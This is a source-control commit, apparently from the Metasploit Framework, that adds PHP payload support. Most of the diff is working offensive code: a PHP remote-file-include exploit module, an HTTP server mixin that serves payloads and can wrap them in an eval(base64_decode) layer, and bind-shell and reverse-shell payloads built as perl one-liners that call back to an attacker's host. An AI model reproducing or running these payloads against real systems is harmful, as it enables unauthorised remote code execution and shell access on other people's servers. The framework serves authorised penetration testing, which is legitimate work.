Initial support for PHP payloads

git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-17 07:57:51 +00:00 · 2006-12-17 07:57:51 +00:00 · ffc626675b
parent 23a61e0a49
commit ffc626675b
7 changed files with 263 additions and 1 deletions
--- a/lib/msf/core/exploit/http.rb
+++ b/lib/msf/core/exploit/http.rb
@ -420,7 +420,7 @@ protected
 	# challenging.
 	#
 	def random_uri
-		"/" + Rex::Text.rand_text_alphanumeric(rand(64) + 10)
+		"/" + Rex::Text.rand_text_alphanumeric(rand(10) + 6)
 	end

 	#
@ -545,4 +545,74 @@ protected

 end

+
+###
+#
+# This module provides methods for exploiting an HTTP client by acting
+# as an HTTP server.
+#
+###
+module Exploit::Remote::HttpServer::PHPInclude
+
+	include Msf::Exploit::Remote::HttpServer
+
+	def initialize(info = {})
+	
+		# Override TCPServer's stance of passive
+		super(update_info(info, 'Stance' => Msf::Exploit::Stance::Aggressive))		
+		
+        register_evasion_options(
+            [
+				OptEnum.new('PHP::Encode', [false, 'Enable PHP code obfuscation', 'none', ['none', 'base64']]),
+            ], Exploit::Remote::HttpServer::PHPInclude
+        )
+	end
+ 
+ 	#
+	# Override exploit() to handle service start/stop
+	#
+ 	def exploit
+		start_service
+		print_status("PHP include server started.");
+		
+		php_exploit
+		
+		select(nil, nil, nil, 5)
+		stop_service
+	end
+	   
+	#
+    # Transmits a PHP payload to the web application
+    #
+    def send_php_payload(cli, body, headers = {})
+
+		case datastore['PHP::Encode']
+		when 'base64'
+			body = "<?php eval(base64_decode('#{Rex::Text.encode_base64(body)}'));?>"
+		when 'none'
+		end
+		
+		send_response(cli, body, headers)
+	end
+
+	#
+	# Handle an incoming PHP code request
+	#
+	def on_request_uri(cli, request, headers={})
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+		
+		# Send it to the application
+		send_php_payload(cli, p.encoded, headers)
+	end
+	
+	#
+	# Return the PHP include URL (pre-encoded)
+	#
+	def php_include_url
+		"http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{get_resource()}"
+	end
+	
+
+end
 end
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@ -396,4 +396,12 @@ class Msf::Module::Platform
 		Rank = 100
 		Alias = "unix"
 	end
+	
+	#
+	# Generic PHP
+	#
+	class PHP < Msf::Module::Platform
+		Rank = 100
+		Alias = "php"
+	end	
 end
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@ -69,6 +69,7 @@ ARCH_MIPS  = 'mips'
 ARCH_PPC   = 'ppc'
 ARCH_SPARC = 'sparc'
 ARCH_CMD   = 'cmd'
+ARCH_PHP   = 'php'
 ARCH_TYPES =
 	[
 		ARCH_X86,
@ -76,6 +77,7 @@ ARCH_TYPES =
 		ARCH_PPC,
 		ARCH_SPARC,
 		ARCH_CMD,
+		ARCH_PHP
 	]

 ARCH_ALL = ARCH_TYPES
@ -86,4 +88,6 @@ ARCH_ALL = ARCH_TYPES
 ENDIAN_LITTLE = 0
 ENDIAN_BIG    = 1

+IS_ENDIAN_LITTLE = ( [1].pack('s')[0] == 1 ) ? true : false
+IS_ENDIAN_BIG    = ( not IS_ENDIAN_LITTLE )

--- a/modules/exploits/multi/webapp/php_include.rb
+++ b/modules/exploits/multi/webapp/php_include.rb
@ -0,0 +1,44 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Multi::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+	include Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'PHP Include Generic Exploit',
+			'Description'    => %q{
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 3509 $',
+			'References'     =>
+				[
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 32768,
+				},
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DefaultTarget' => 0))
+	end
+
+	
+	def php_exploit
+		connect
+		req = "GET /test.php?path=#{Rex::Text.uri_encode(php_include_url)} HTTP/1.0\r\n\r\n"
+		print_status("Sending: #{req}")
+		sock.put(req)
+		disconnect
+	end
+	
+end
+end	
--- a/modules/nops/php/generic.rb
+++ b/modules/nops/php/generic.rb
@ -0,0 +1,33 @@
+require 'msf/core'
+
+module Msf
+module Nops
+module Php
+
+###
+#
+# This class implements a "nop" generator for PHP payloads
+#
+###
+class Generic < Msf::Nop
+
+	def initialize
+		super(
+			'Name'        => 'PHP Nop Generator',
+			'Alias'       => 'php_generic',
+			'Version'     => '$Revision: 3425 $',
+			'Description' => 'Generates harmless padding for PHP scripts',
+			'Author'      => 'hdm',
+			'License'     => MSF_LICENSE,
+			'Arch'        => ARCH_PHP)
+	end
+
+	# Generate valid PHP code up to the requested length
+	def generate_sled(length, opts = {})
+		# Default to just spaces for now
+		" " * length
+	end
+
+end
+
+end end end
--- a/modules/payloads/singles/php/bind_perl.rb
+++ b/modules/payloads/singles/php/bind_perl.rb
@ -0,0 +1,53 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Php
+
+module BindPerl
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'PHP Command Shell, Bind TCP (via perl)',
+			'Version'       => '$Revision: 3636 $',
+			'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
+			'Author'        => ['Samy <samy@samy.pl>', 'cazz'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'php',
+			'Arch'          => ARCH_PHP,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + "<?php system(base64_decode('#{Rex::Text.encode_base64(command_string)}')) ?>"
+	end
+	
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+
+		cmd = "perl -MIO -e '$p=fork();exit,if$p;while($c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}'"
+
+		return cmd
+	end
+
+end
+
+end end end end
--- a/modules/payloads/singles/php/reverse_perl.rb
+++ b/modules/payloads/singles/php/reverse_perl.rb
@ -0,0 +1,50 @@
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Php
+
+module ReversePerl
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'PHP Command, Double reverse TCP connection (via perl)',
+			'Version'       => '$Revision: 3636 $',
+			'Description'   => 'Creates an interactive shell via perl',
+			'Author'        => 'cazz',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'php',
+			'Arch'          => ARCH_PHP,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + "<?php system(base64_decode('#{Rex::Text.encode_base64(command_string)}')) ?>"
+	end
+	
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+	end
+
+end
+
+end end end end